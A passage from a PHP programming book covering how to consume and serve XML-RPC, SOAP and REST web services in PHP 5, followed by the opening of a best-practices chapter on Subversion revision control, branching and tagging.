       catch (Zend_XmlRpc_Client_FaultException $e)

       {

         echo $e->getMessage();

       }




      We first instantiate the Zend_XmlRpc_Client object with the URL of the web service.
      The URL I've used above is relevant only to our testing environment so be sure to
      change it to an appropriate alternative if you’re testing this script. The
      Zend_XmlRpc_Client then allows us to call the web service directly as if it were a
      PHP method, for example, $proxy->math->add.

      It’s really that easy; the Zend_XmlRpc_Client and its namespace proxy make calling
      XML-RPC methods as simple as calling object methods.12 We pass native PHP values
      as method arguments, and get PHP values back. What could be easier?

      PHP’s Native XML-RPC Extension
      If you don’t want to install Zend Framework, what other options do you have?

      PHP has a native XML-RPC extension, ext/xmlrpc, that can either be compiled
      using the --with-xmlrpc directive, or installed via PECL. It’s marked as experiment­
      al, so using it in a production environment may be risky, though it has been available
      since the early PHP 4 series. It provides functions for encoding and decoding XML­
      RPC values, creating XML-RPC requests and responses, and binding an XML-RPC
      server to PHP callbacks.

      A basic request uses the xmlrpc_encode_request function:

       $request = xmlrpc_encode_request($methodName, $valuesArray); 



      Here, $methodName is the XML-RPC method being requested, and $valuesArray is
      an array of values that are to be passed as arguments to the request. If you need to
      specify an XML encoding, you can pass an optional third value—an associative ar­
      ray—with some options:




      12
           http://framework.zend.com/manual/en/zend.xmlrpc.html
XML and Web Services         415


 $request = xmlrpc_encode_request(

     $methodName, 

     $valuesArray, 

     array('encoding' => 'UTF-8')

 ); 



The returned $request is the XML that we can use to make the request.

Note that some XML-RPC types don’t have direct equivalents in PHP; to use these,
you’ll need to tell ext/xmlrpc how they should be encoded using the
xmlrpc_set_type function. These values can then be passed directly to the
xmlrpc_encode_request function:


 $date = xmlrpc_set_type('2006-12-01', 'datetime');

 $base64 = xmlrpc_set_type($base64EncodedData, 'base64');

 $request = xmlrpc_encode_request(

   $methodName, 

   array($date, $base64, $assocArray),

   array('encoding' => 'UTF-8')

 ); 



As an example, here’s a simple XML-RPC client script that uses ext/xmlrpc and
the XML-RPC server we saw in “How do I serve my own XML-RPC web services?”:

                                                    ext_xmlrpc_client.php (excerpt)

 try
 {
   $request = xmlrpc_encode_request(
     'math.add',
     array(array(1,2)),
     array('encoding' => 'UTF-8')
   );

   $context = stream_context_create(array('http' => array(
       'method' => "POST",
       'header' => "Content-Type: text/xml",
       'content' => $request
   )));
   $file = file_get_contents(
       'http://localhost/phpant2/chapter_12/examples/' .
       'zend_xmlrpc_serv.php', false, $context);
    if(!file) {
416   The PHP Anthology


            throw new Exception('Unable to get response from web service');

          }

         $response = xmlrpc_decode($file);

         if (is_array($response) && xmlrpc_is_fault($response))

         {

           throw new Exception($response['faultString'],

               $response['faultCode']);

         }

         echo '1 + 2 = ' . $response;

       }

       catch (Exception $e)

       {

         echo $e->getMessage();

       }




      PHP’s ext/xmlrpc extension does most of the work to abstract the basic XML-RPC
      functionality of encoding and decoding values and requests and responses. However,
      you have to create the actual data exchange transfer yourself, as we did above with
      the file_get_contents function. This approach offers nothing near the simplicity
      of Zend_XmlRpc_Client unless, for example, you write your own class wrapper
      around it.


      How do I serve my own
      XML-RPC web services?
      XML-RPC servers listen at a specified address for HTTP POST requests, and return
      XML in the response content using the text/xml Content-Type header. Errors are
      reported using an XML-RPC fault response, which is an XML struct response that
      contains faultCode and faultString elements.

      Let’s see what’s involved in the process of decoding incoming requests, dispatching
      them, and returning a valid response.

      Solution
      The Zend_XmlRpc_Server class allows you to bind classes or functions to the server
      with optional namespaces;13 it then uses the Reflection API, and the developer­


      13
           http://framework.zend.com/manual/en/zend.xmlrpc.html
XML and Web Services         417

created phpDocumentor docblocks describing the functions or class methods,14 to
determine the XML-RPC prototypes. The caveat to using this approach is that you
must use XML-RPC types in your docblocks to describe your parameters and return
values.

Zend_XmlRpc_Server, like all server classes in the Zend Framework, follows PHP’s
SoapServer API, which makes the interface consistent across the different protocol
implementations.

As an example, here’s a simple Math class with two methods, add and multiply,
for which we can build a server:

                                                            Math.class.php (excerpt)

 /**
   * Math methods
   */
 class Math
 {
      /**
       * Return the sum of all values in an array
       *
       * @param array $values An array of values to sum
       * @return int
       */
      public static function add($values)
      {
          return array_sum($values);
      }
      /**
       * Return the product of all values in an array
       *
       * @param array $values An array of values to multiply
       * @return int
       */
      public static function multiply($values)
      {
          return array_product($values);
      }
 }




14
     http://www.phpdoc.org/
418   The PHP Anthology

      Now, let’s build the XML-RPC server, and for good measure, let’s also create a
      function for retrieving XML-RPC server information:

                                                              zend_xmlrpc_serv.php (excerpt)

       require_once 'Zend/XmlRpc/Server.php';
       require_once 'Math.class.php';

       /**
         * Get some info from the server
         *
        * @return struct
         */
       function getInfo()
       {
          return array(
              'publisher' => 'SitePoint',
              'title' => 'The PHP Anthology'
          );
       }

       $server = new Zend_XmlRpc_Server();
       // Math class methods will be available in the 'math' namespace
       $server->setClass('Math', 'math');
       // getInfo() function will be available as server.getInfo
       $server->addFunction('getInfo', 'server');
       // Handle a request
       echo $server->handle();



      The Zend_XmlRpc_Server instance in this example will make three methods avail­
      able, math.add, math.multiply, and server.getInfo, in addition to several system
      methods that we can use to obtain information about the server. It will automatically
      check incoming requests to make sure they adhere to the various method signatures,
      throwing fault responses if they do not, and return the XML-RPC response along
      with any required headers. You don’t need to change your code to conform to the
      server class requirements; the server conforms to your code.

      You will need to write phpDocumentor docblocks for each method or function you’ll
      be serving, and ensure they contain @param and @return tags; the server uses these
      to create the method signatures, and compares the types and numbers of incoming
      parameters with those signatures to ensure the incoming request conforms to the
      definition. Additionally, the types specified with these tags should conform to XML­
XML and Web Services         419

RPC type definitions; for example, use struct for associative arrays, date-
Time.iso8601 for dates, and so on.

PHP’s Native XML-RPC Extension
Serving XML-RPC with Zend_XmlRpc_Server is as easy as serving SOAP requests
in PHP 5; simply register a class or function with the server, and handle it. But be­
sides Zend_XmlRpc_Server, what options do we have?

ext/xmlrpc can be used to build XML-RPC servers, too. We simply create an XML­
RPC server using xmlrpc_server_create, register callbacks to XML-RPC method
names, grab the request, handle it, and send the response back. As an example, let’s
try to serve the following method and function:

                                                         ext_xmlrpc_serv.php (excerpt)

 /**
   * Math methods
   */
 class Math
 {
      /**
       * Return the sum of all values in an array
       *
       * @param array $values An array of values to sum
       * @return int
       */
      public static function add($method, $params)
      {
         return array_sum($params[0]);
      }
 }

 /**
   * Return the product of some values
   *
  * @param string $method The XML-RPC method name called
   * @param array $params Array of parameters from the request
   * @return int
   */
 function product($method, $params)
 {
      return array_product($params);
 }
420   The PHP Anthology

      Now that we’ve created these definitions, we’ll register them with the XML-RPC
      server:

                                                              ext_xmlrpc_serv.php (excerpt)

       $server = xmlrpc_server_create();
       xmlrpc_server_register_method($server, 'math.add', array('Math',
           'add'));
       xmlrpc_server_register_method($server, 'product', 'product');



      Now we need to grab the request, dispatch it, and return a response:

                                                              ext_xmlrpc_serv.php (excerpt)

       $request = file_get_contents('php://input');
       $response = xmlrpc_server_call_method($server, $request, null);
       header('Content-Type: text/xml');
       echo $response;



      If you examine this example closely, you’ll notice that functions and method calls
      have to follow a particular signature; specifically, they can only accept two argu­
      ments: the requested $method and the requested $params. This means that if you
      want to create an XML-RPC server using ext/xmlrpc, you must either write all your
      method handlers to conform to this specification, write wrappers for your existing
      methods, or write a dispatcher to dispatch method calls using the original parameter
      order—all of which activities are beyond the scope of this discussion.

      The easier approach is to use an XML-RPC server that creates this magic for you.
      PEAR’s XML_RPC2 and Zend_XmlRpc are two such implementations. Zend_XmlRpc
      makes XML-RPC a first-class OOP citizen, simplifying the process of making requests
      and serving responses, and allowing any function or class method to be used as a
      server handler.


      How can I consume SOAP web services?
      SOAP, originally an acronym for Simple Object Access Protocol, but now simply a
      protocol name, is, to quote the specification, “a lightweight protocol intended for
      exchanging structured information in a decentralized, distributed environment.”
      SOAP provides tremendous flexibility and extensibility.
XML and Web Services         421

Like the other protocols discussed in this section, SOAP uses XML to transfer
messages between the client and server. The base message unit that’s transferred is
an object. A server needs to specify the available methods and properties, and make
that specification available to clients so that they can initiate requests. This specific­
ation is achieved using a WSDL, the Web Services Description Language, specifica­
tion.

The SOAP and WSDL specifications are notoriously difficult to decipher. The gen­
eral consensus among developers is to use WSDL development tools to create the
WSDL from your application classes, and to use clients and servers provided in
your language to conduct the actual SOAP communication. Fortunately, PHP 5 has
native SoapClient and SoapServer classes, and tools are emerging for generating
the WSDL.

The topic of consuming SOAP-based web services is incredibly broad and we
couldn’t possibly cover it in any great detail in this book, but here’s a gentle intro­
duction.

Solution
Using the PHP 5 SoapClient class is incredibly easy:

 $client = new SoapClient($uriToWsdl,

     array('location' => $uriToSoapService));

 $result = $client->SomeMethod($value1, $value2)



There’s certainly much more to the SoapClient class, but that’s the basic usage:
create a SoapClient instance by passing the URL to the WSDL specification, and
the location of the SOAP service, as arguments to the SoapClient constructor, and
start making calls. The SoapClient makes all the methods of the SOAP service
available as PHP methods.

What if you want to pull the results of a SOAP request into an object? No problem!
You can easily map a SOAP response to a PHP class. Here’s a hypothetical example
that uses a book information service. The SOAP service provides a getBookInfo
method. If we pass it an $id value, it will return a response representing a book
with author, title, date, and publisher properties. This response is defined in
the web service’s WSDL file as the type Book. And if we already have an object for
422   The PHP Anthology

      a book in our PHP application (let’s call it MyBook), we can map the SOAP response
      type onto our own MyBook object. First, we define our MyBook class:

       class MyBook
       {
         public $author;
         public $title;
         public $date;
         public $publisher;
       }


      When we instantiate the SoapClient object, we add a classmap option that maps
      the WSDL Book type to our MyBook PHP class:

       $client = new SoapClient($uriToWsdl, array(
           'location' => $uriToSoapService,
           'classmap' => array('Book' => 'MyBook')
       ));


      Now, when we call the SOAP method that would normally return the SOAP object
      type, we receive an instance of our PHP class instead:

       $book = $client->GetBookInfo($id); // $book is a MyBook instance
       echo $book->title;


      When it binds a class to a SOAP response, SoapClient will set in the object any
      public properties for which it finds a match in the response. Because the returned
      object instance is a standard PHP object, you can also define methods for accessing
      or transforming the SOAP data in the class.

      Discussion
      Assuming that the remote service has a defined WSDL specification, making requests
      to SOAP services is tremendously easy in PHP 5. The flexibility to bind objects to
      responses can offer tremendous opportunities for working with remote data. If
      you’ve been afraid of SOAP before, yet you’re comfortable with OOP, there’s no
      need to be afraid any longer!
XML and Web Services       423


How do I serve SOAP web services?
You’ve dipped your toes in the SOAPy water by consuming some SOAP services
in “How can I consume SOAP web services?”, and now you’re thinking that the
next step is to create some of your own. You’ve got a number of classes that seem
eligible; how can you expose their APIs publicly?

Solution
Serving SOAP is roughly as easy as the using the client: use SoapServer. The topic
of creating SOAP-based web services is another broad area that we couldn’t possibly
cover in any great detail in this book, but let’s get our bearings by looking a simple
example.

First, let’s define a class for a book with the original name of Book:

 class Book

 {

   public $author;

   public $title;

   public $date;

   public $publisher;

   /**

    * Constructor

    *

    * @param string $author

    * @param string $title

    * @param int $date

    * @param string $publisher

    * @return void 

   public function __construct($author, $title, $date, $publisher)

   {

     $this->author     = $author;

     $this->title      = $title;

     $this->date       = $date;

     $this->publisher = $publisher;

   }

 }



With that out of the way, we can define an API for retrieving books with a class
called BookService:
424   The PHP Anthology


       class BookService
       {
         /**
           * Retrieve book information and send
           *
           * @param int $id
           * @return Book
           */
         public function GetBookInfo($id)
         {
            ⋮ perform some work and get some book details…
             $book = new Book($author, $title, $date, $publisher);
             return $book;
         }
       }


      Now let’s bind these classes to a SoapServer instance:

       $server = new SoapServer($uriToWsdl, array(
           'encoding' => 'ISO-8859-1',
           'actor' => $uriToSoapService,
           'classmap' => array('Book' => 'Book')
       ));
       $server->setClass('BookService');
       $server->handle();


      That’s all there is to it; your BookService class’s GetBookInfo method is now ex-
      posed as a SOAP method, and will return Book instances to requests from SOAP
      clients.

      Discussion
      Serving SOAP has never been so easy as it is with PHP 5. But there’s one more aspect
      to consider: what about the WSDL specification?

      It’s possible to use SOAP between PHP servers without using WSDL, but this ap-
      proach is problematic, because it means that many of the features of the SOAP client,
      such as the auto-discovery of available methods, won’t work. It then becomes the
      responsibility of the service developer to communicate the available methods to
      those consuming the services. Although generating your own WDSL may be a
      daunting task, given the complexity of the specification, many IDEs have tools for
      generating WSDL specifications based on the introspection of your classes. Another
XML and Web Services      425

choice for generating WSDL specifications, and a newcomer on the scene, is
Zend_Soap, from the Zend Framework.15 This component contains the
Zend_Soap_AutoDiscover class, which will generate a WSDL specification from a
class using PHP’s own Reflection API. Here’s an example:

 $generator = new Zend_Soap_AutoDiscover('BookService');

 $wsdl = $generator->handle();



From here, you can cache the generated WSDL specification, contained in the $wsdl
variable, in a web-accessible location, then start to create servers and clients for it
using SoapServer and SoapClient.


How can I consume REST services?
REST, or Representational State Transfer, is a newcomer on the web services scene,
and has gained considerable popularity in the past few years. The ideas behind this
architectural approach are simple: application state and functionality are separated
into resources that can be addressed with a unique identifier, all resources share a
consistent interface and standardized content types. As it happens, the Web is a
great example of this style of application architecture. We can use the URL as the
unique identifier for resources and the HTTP protocol as the consistent interface
through which we access the resources. Finally, resources are represented by
standardized content types—XML, HTML, and so on.16

As an example, let’s consider a hypothetical REST service for books:

■	 A GET request to http://example.com/books uses XML to return a list of books.

■	 A POST request that contains XML book data and is made to the same URL will
   add a new book to the service.

■	 Retrieving the XML for an individual book involves making an HTTP GET request
   to a slightly different URL that specifies a particular resource, such as
   http://example.com/books/php-anthology.




15
   http://framework.zend.com/manual/en/zend.soap.html
16
   A more detailed explanation can be found on Wikipedia, at
http://en.wikipedia.org/wiki/Representational_State_Transfer.
426   The PHP Anthology

      ■	 Editing the book involves sending XML book data via an HTTP PUT request to
         the same URL.

      ■	 Sending an HTTP DELETE request to the URL would delete the resource.

      Such a service would be considered RESTful, that is, it would follow the principles
      of REST. Each resource has a unique identifier, its URL, and each resource has a
      consistent interface, HTTP, through which the request type describes the type of
      action being requested.

      Basically, REST makes use of the technology of the Web, unlike XMLRPC or SOAP,
      which use the Web simply as a means for sending commands. For example, in our
      REST API above, sending a GET request to http://example.com/books/php-anthology
      returns the XML representation of the book. If the book doesn’t exist, the service
      responds with a standard HTTP 404 Not Found response. In contrast, using an
      XMLRPC interface to the same service might require you open a connection to the
      service and make a method call to a getBook method, passing the book’s identifying
      code, php-anthology, as an argument. If the book didn’t exist, the service would
      respond with an error message. The main difference between these two approaches
      is the use of HTTP to represent the intended action—GETting a book—and the
      meaningful URL that represents the book itself.

      In real-world circumstances, many browsers and HTTP clients still don’t implement
      PUT and DELETE, so all resource update and delete operations are completed via
      POST requests that use additional request parameters to represent the operation de­
      sired. While not entirely RESTful, the practice is widespread enough to be considered
      the standard approach.

      Modern REST services that use XML are common. Some REST services provide
      XML schemas so that consumers can easily determine how to get at the data they
      need or format their requests, while others simply provide API documentation.

      Solution
      By now, you should be well on your way to being able to handle any XML that’s
      thrown at you. We can use SimpleXML to parse REST responses, and SimpleXML,
      DOM, or XMLWriter to create requests (if a data payload is needed).
XML and Web Services        427

To use a specific REST service, you’ll need to obtain its API documentation, but for
the purposes of this example, let’s use the hypothetical REST service for books we
defined above. Let’s assume that the URL http://example.com/books, when called
via an HTTP GET request, returns the following XML list of books:

 <?xml version="1.0" encoding="UTF-8"?>

 <books>

     <book id="php-anthology">PHP Anthology</book>

     <book id="css-anthology">CSS Anthology</book>

 </books>



In our book service, the id attribute of each book can be used to retrieve the book’s
details. Here’s an example of the XML returned by a GET request to
http://example.com/books/php-anthology:

 <?xml version="1.0" encoding="UTF-8"?>

 <book>

     <id>php-anthology</id>

     <title>PHP Anthology</title>

     <publisher>SitePoint Pty., Ltd.</publisher>

     <chapterCount>14</chapterCount>

     <edition>2</edition>

     <pubDate>2007</pubDate>

 </book>



To retrieve and process this information, we might use a hypothetical client script
that uses SimpleXML, like this:

 $books = new SimpleXMLElement('http://example.com/books',

     null, true);

 $ids = array();

 foreach ($books as $book) {

     $ids[] = $book['id'];

 }


 foreach ($ids as $id) {

     $book = new SimpleXMLElement(

         'http://example.com/books/' . $id, 

         null, 

         true
428   The PHP Anthology


            );

            echo $book->title, ', published by: ', $book->publisher, "n";

       }



      For XML-based REST services, we can employ SimpleXML to do the heavy lifting
      of making the request, receiving the response, and parsing it. In the example above,
      we retrieve the books list by instantiating a new SimpleXMLElement object, passing
      the URL as the first argument. If the first argument to the constructor is a URL, the
      third argument must be true. We grab the id attribute values of all books, and use
      them to make new requests to obtain the XML data for each book. We then grab
      each book’s title and publisher in order to display the list.

      How would you create a new book using this service? Most services would have
      you POST a book definition to the base URL, and in our example, that approach
      might look like this:

       $book = new SimpleXMLElement(

           '<?xml version="1.0" encoding="UTF-8"?><book></book>');

       $book->addChild('title', 'Life, the Universe, and Everything');

       $book->addChild('publisher', 'Del Rey');

       $book->addChild('chapterCount', 42);

       $book->addChild('edition', '26 April 2005');

       $book->addChild('pubDate', '2005');


       $opts = array('http' => array(

           'method' => 'POST',

           'header' => 'Content-type: application/x-www-form-urlencoded',

           'content' => $book->asXML()

       ));

       $context = stream_context_create($opts);

       $response = file_get_contents('http://example.com/books', false,

           $context);



      The task of editing a particular resource would be similar to that of adding a new
      document. However, the URL we’ll use will be the resource’s unique URL, and in­
      stead of sending the entire book definition, we’ll need to send only the data that’s
      changing:

       $book = new SimpleXMLElement(

           '<?xml version="1.0" encoding="UTF-8"?><book></book>');

       $book->addChild('chapterCount', 21);
XML and Web Services       429


 $book->addChild('edition', 'Del Rey 2005'); 


 $opts = array('http' => array(

     'method' => 'POST',

     'header' => 'Content-type: application/x-www-form-urlencoded',

     'content' => $book->asXML()

 ));

 $context = stream_context_create($opts);

 $response = file_get_contents(

     'http://example.com/books/php-anthology', false, $context);



Maybe we want to delete the book from the list—how would we accomplish this?
So far, we’ve distinguished between adding and updating resources by changing
the URL. A proper RESTful web service would have us send an HTTP DELETE request
to the book’s unique URL, but since not all HTTP clients can generate DELETE re­
quests, our web service does the next best thing: it requires users to POST a delete
element with a value of 1:

 $book = new SimpleXMLElement(

     '<?xml version="1.0" encoding="UTF-8"?><book></book>');

 $book->addChild('delete', 1);

 $opts = array('http' => array(

     'method' => 'POST',

     'header' => 'Content-type: application/x-www-form-urlencoded',

     'content' => $book->asXML()

 ));

 $context = stream_context_create($opts);

 $response = file_get_contents(

     'http://example.com/books/php-anthology', false, $context);



The example above is a bit contrived, but it’s not far off the mark. A client makes
simple HTTP GET requests to resources, and decides what to do with the responses,
or POSTs XML to the service in order to add, update, or delete resources. SimpleXML
is the staple resource for consuming and generating requests, and PHP’s own streams
layer makes POSTing requests a breeze.

In a real REST service, you’ll need to examine the API carefully to determine which
URLs are available, what XML they return, and what XML they expect for operations
that affect data in the service. REST is loosely defined, so each time you want to
interact directly with a new REST service, you’ll need to do a bit of learning.
430   The PHP Anthology

      Using the Zend Framework
      Another possible approach to consuming a REST service is to use Zend Framework’s
                                      17
      Zend_Rest_Client component. This client expects that the REST server it contacts
      is using XML for the transaction, which should be a safe assumption. After perform­
      ing the request, we access the response using object properties, which eliminates
      the need to perform type casting as we must with SimpleXML.

      Technorati’s bloginfo API requires you to make a GET request to the following
      URL:18

       http://api.technorati.com/bloginfo?key=apikey&url=blog url



      The URL requires two arguments to appear in the query string: your API key and
      the blog’s URL. You can get your own API key from the Technorati web site at
      http://technorati.com/developers/apikey.html.

      The above URL will return the following XML:

       <?xml version="1.0" encoding="utf-8"?>

       <!-- generator="Technorati API version 1.0 /bloginfo" -->

       <!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"

           "http://api.technorati.com/dtd/tapi-002.xml">

       <tapi version="1.0">

       <document>

       <result>

         <url>URL</url>

         <weblog>

           <name>blog name</name>

           <url>blog URL</url>

           <rssurl>blog RSS URL</rssurl>

           <atomurl>blog Atom URL</atomurl>

           <inboundblogs>inbound blogs</inboundblogs>

           <inboundlinks>inbound links</inboundlinks>

           <lastupdate>date blog last updated</lastupdate>

           <rank>blog ranking</rank>

           <lang></lang>

           <foafurl>blog foaf URL</foafurl>

         </weblog>




      17
           http://framework.zend.com/manual/en/zend.rest.html
      18
           http://technorati.com/developers/api/bloginfo.html
XML and Web Services         431


   <inboundblogs>inbound blogs</inboundblogs>

   <inboundlinks>inbound links</inboundlinks>

 </result>

 </document>

 </tapi>



As an example, you could use the following approach to use Technorati’s bloginfo
service:

                                                  zend_rest_technorati.php (excerpt)

 require_once 'ZendRestclient.php';
 $key = apikey; // Technorati requires an API key
 $technorati = new Zend_Rest_Client(
     'http://api.technorati.com/bloginfo');
 $technorati->key($key);
 $technorati->url('http://sitepoint.com');
 $result = $technorati->get();
 echo $result->weblog->name .
     ' (rank: '. $result->weblog->rank . ')';



This code would return:

 SitePoint : New Articles, Fresh Thinking for Web Developers and

 ➥ Designers (rank: 196)



How can I serve REST services?
You’re jumping on the REST bandwagon. Your boss is convinced that this is the
big new trend in web services, and wants something out the door today. What do
you need to do?

Solution
Honestly, all you need to do is:

■ Create URLs or a URL schema that can map to your resources.
■ Create XML for your responses.

You need to determine which resources you’ll make available, and then come up
with a URL schema to cover them. In this example, let’s use books as the resource
432   The PHP Anthology

      we want to make available. Perhaps you need services that allow you to list the
      book resources, detail a single book at a time, and allow users to post information
      about new books and edit that for existing books.

      A RESTful URL schema might look like this:

      ■ retrieve list of books: http://example.com/books
      ■ retrieve single book: http://example.com/books/book-name

      To add a book, you would POST to the first URL; to update the details of an existing
      book, you would POST to the second. Next, you need to create a script to handle the
      incoming requests. Make sure you have a look at “How do I make “pretty” URLs in
      PHP?” in Chapter 5—there, you’ll find a complete solution for creating a URL schema
      with the Apache web server and a request handling class. Here’s a simple example
      script to handle our book requests:

       $path = explode(‘/’, trim($_SERVER[‘PATH_INFO’], ‘/’));

       if ((1 == count($path)) && (‘books’ == $path[0]))

       {

         if (‘post’ == strtolower($_SERVER[‘REQUEST_METHOD’]))

         {

            ⋮ new book entry
         }

         else

         {

            ⋮ list books
         }

       }

       elseif ((2 == count($path)) && (‘books’ == $path[0]))

       {

         if (‘post’ == strtolower($_SERVER[‘REQUEST_METHOD’]))

         {

           ⋮ edit book entry
         }

         else

         {

           ⋮ retrieve book entry
         }

       } 



      This script starts by exploding the path information of the incoming request into
      an array, and trimming the trailing / character. It then tests how many elements are
XML and Web Services        433

generated, and whether the first element is books. If only one element is present,
books, the script checks the request method. If it’s a POST request, the code takes
the branch to creating a new book; if it’s a GET request, the code takes the branch to
listing all the books.

If two elements are present, the script assumes that the second element is the book
name. In this case, a POST request represents an update to the specific book and a
GET request will display the named book.

For the book list and named-book information requests, simply generate or fetch
the XML to return to the user. In the case of new entries or updated entries, you’ll
need to retrieve and parse the incoming XML first. To retrieve the incoming XML,
grab it from the raw POST request like this:

 $post = fopen('php://input', 'r');

 $xml = fread($post);

 fclose($post); 



Once you have the XML, you can parse and act on it as necessary.

Discussion
REST services allow us either to create the XML ahead of time, or to generate it on
the fly using PHP as I’ve described elsewhere in this chapter. I highly recommend
that you cache the responses, unless the request is allowed to change the data; one
easy way to scale REST is by caching the service as static XML, because static content
is usually served much faster than dynamic content by modern web servers.

While REST services scale well and are relatively easy to implement, they do make
the job more difficult for developers who want to use your services, since developers
need to learn a new XML schema for every new REST service they consume. How­
ever, the simplicity of dealing with XML in PHP 5 makes this a moot point in most
regards, and the combination of REST and SimpleXML makes for some very powerful
web services, both on the client and server ends.


Summary
In this chapter, we’ve taken a quick tour of PHP 5’s various XML and web service
extensions. We discussed the tasks of parsing and generating XML and using RSS
434   The PHP Anthology

      feeds, concluding that SimpleXML is PHP 5’s Swiss Army Knife for XML manipu­
      lation, but also noting other important extensions such as SAX, XMLReader,
      XMLWriter, and DOM (on which SimpleXML is based). Searching XML via XPath,
      using both DOM and SimpleXML, was demonstrated, and the basic XPath syntax
      was covered.

      Most modern web services use XML for their payloads. XML-RPC uses XML for
      type hinting values passed in a request and returned in a response; with modern
      XML-RPC libraries such as Zend_XmlRpc, XML-RPC services can be called as PHP
      object methods transparently. SOAP defines an object as the unit of transport, and
      PHP 5’s SoapServer and SoapClient classes make creating and consuming SOAP
      services trivial. Finally, we discussed REST and RESTful web services, using Sim­
      pleXML to generate and consume REST resources.
13
                               Chapter




Best Practices
The fact that PHP has an incredibly low barrier to entry represents both its greatest
strength and greatest weakness. To its merit, PHP allows the novice programmer to
develop feature-rich applications without needing to learn even the rudiments of
computer science. The downside, however, is that as PHP offers many ways to
complete the same task, application code can quickly become unmaintainable.

Many programmers in the PHP field are now recognizing the need to standardize
and promote best practices. Some of these best practices are PHP specific, such as
the usage of tools like phpDocumentor for consistent documentation,1 or testing
suites such as SimpleTest2 and PHPUnit.3 Other practices that are being promoted
in the PHP community are more generic—the use of revision control systems and
code deployment practices, for example. Regardless, if you follow all of them, these
practices will make your life—and the lives of those who may later maintain your
code—much easier.




1
  http://www.phpdoc.org/
2
  http://simpletest.org/
3
  http://www.phpunit.de/
436   The PHP Anthology


      How do I track revisions
      to my project’s code?
      Picture this sad scene: your site is on the verge of being launched, and you’ve intro­
      duced some new code to the system at the eleventh hour only to find, to your
      chagrin, that other features are now broken. You now have less than an hour to fix
      the problem. You need to undo your changes. But how on earth do you do that?

      We can only hope you’re using some form of revision control software (RCS).4 Re­
      vision control software allows users to track changes to documents, code, and other
      files, and offers features to allow the merging of changes from multiple users, and
      the management of different versions of your code. Think of RCS as both a backup
      repository for your code, and a record of all the changes it undergoes for the duration
      of a project.

      Solution
      My preferred RCS is Subversion, and this software will be used in all the examples
      throughout this chapter.5

      So you need to undo your changes fast? If you haven’t already committed your
      changes, you can roll them back easily with the following command:

          $ svn up -r BASE filename 



      If you’ve already committed your changes, the following command will undo them:

          $ svn revert filename 



      This command will revert your code to the previous version:

          $ svn up -r PREV filename 




      4
        See the Wikipedia Version Control entry for a summary of revision control and a comparison of revision

      control systems: http://en.wikipedia.org/wiki/Version_control.

      5
        Visit the Subversion project web site at http://subversion.tigris.org/ for complete documentation.

      O’Reilly Media has published its book, Version Control with Subversion, online at

      http://svnbook.red-bean.com/
Best Practices    437


Discussion
A variety of versioning solutions is available, but they can be grouped into two
major categories: distributed and non-distributed systems.

In distributed systems, each user maintains his or her own repository, and the
software typically tracks only changesets—software patches representing changes
to the files under version control. Developers then share the changesets with one
another, usually maintaining one canonical repository with all the changesets that
have been accepted into the project.

In non-distributed systems, a repository resides on a central server. Developers in­
dividually check out the repository to their own working directories, and check in
their changes as they’re completed.

Both systems have their benefits and downsides. However, non-distributed systems
are more commonly used in PHP projects, so they’re the type you’ll most likely run
into. Having a central repository allows you to designate a single location for the
canonical version of the software you’re developing. You can easily tie in processes
to run pre- and post-commit, perhaps performing unit tests, compiling documenta­
tion, or sending commit notifications to a distribution list.

As I mentioned, many revision control systems are available, in both proprietary
and open source forms. The most popular open source packages, and arguably the
most popular revision control systems, are Concurrent Versioning System (CVS)
and Subversion (SVN). The popularity of the two is, in large part, due to their open
source nature; users obtain the tools for free, and can develop their own tools around
these without needing to worry about license infringement. Additionally, no propri­
etary clients are necessary in order to work with these tools.

CVS is the grandfather of non-distributed systems, and is the chosen revision control
software for high-profile projects such as PHP itself and the PEAR project. Subversion
is an evolution of CVS, and offers easier syntax for renaming files and directories
in a repository, committing entire directory trees, and branching and tagging. This
software is used in many modern frameworks, such as eZ Components and the Zend
Framework.

I personally recommend the use of Subversion for any new PHP projects, as its ease
of setup, simple processes for creating pre- and post-commit hook scripts, and in­
438   The PHP Anthology

      tegration with other tool sets (IDEs and bug-tracking software, for example), are
      unparalleled among RCNs. Another advantage of Subversion is that the entire tree
      is versioned—individual files don’t receive their own versions. This feature allows
      you to make changes to multiple files as a distinct change set. When checking in
      your code, you can check in a complete change—unit tests, code, and documenta­
      tion—all in one go. This style of versioning makes it easier later when you need to
      look through the log files to determine what changed and when, and which files
      were affected.


      How can I maintain multiple
      versions of a single codebase?
      Your project has just had a successful release, and now you need to support that
      release. However, you’ve been hard at work and already have new changes you
      want to introduce for the next release. How can you maintain both code bases, and
      ensure important fixes in one are ported to the other?

      Alternatively, perhaps you need to be able to continue development of your web
      site’s code base, but have a stable, production version of it running as well. How
      can you keep the two versions separate?

      Solution
      Branching and tagging are features common to RCS, allowing you to maintain sep­
      arate branches of code in your repository. A branch is a separate version of the
      software that exists independently from other versions and maintains its own history.
      A tag is a named snapshot of the project at a given point in time.

      A typical repository layout should look something like this:

       project/

           branches/

           tags/

           trunk/ 



      We create a branch for each release like so:
Best Practices    439


 project/

     branches/

         release-1.0.0/

         release-1.1.0/



The use of Subversion allows this task to be completed very easily:

 $ svn copy trunk branches/release-1.1.0 -m '1.1.0 release branch' 



Later, if you need to create a point release—a minor version, especially one intended
to fix bugs rather than add new features—you can create an appropriate tag:

 $ svn copy branches/release-1.0.0

 ➥ tags/release-1.0.1 -m '1.0.1 bugfix release'


Similarly, you can create a branch for a production version of a site:

 project/

     branches/

         production/

     tags/

     trunk/ 



When you’re ready to deploy a software release, create a tag with a name that de­
scribes the changes:

 $ svn copy branches/production tags/2006-09-19-PirateDayJargon

 ➥ -m 'Pirate Day Jargon version of site for Pirate Day' 



Discussion
In most cases, day-to-day development will occur in the repository trunk. When
you’re ready to create a software release, create a branch. From this point forward,
changes in the trunk will not affect code in the release branch—unless you merge
them manually. Branches provide code separation, which helps you to prevent new
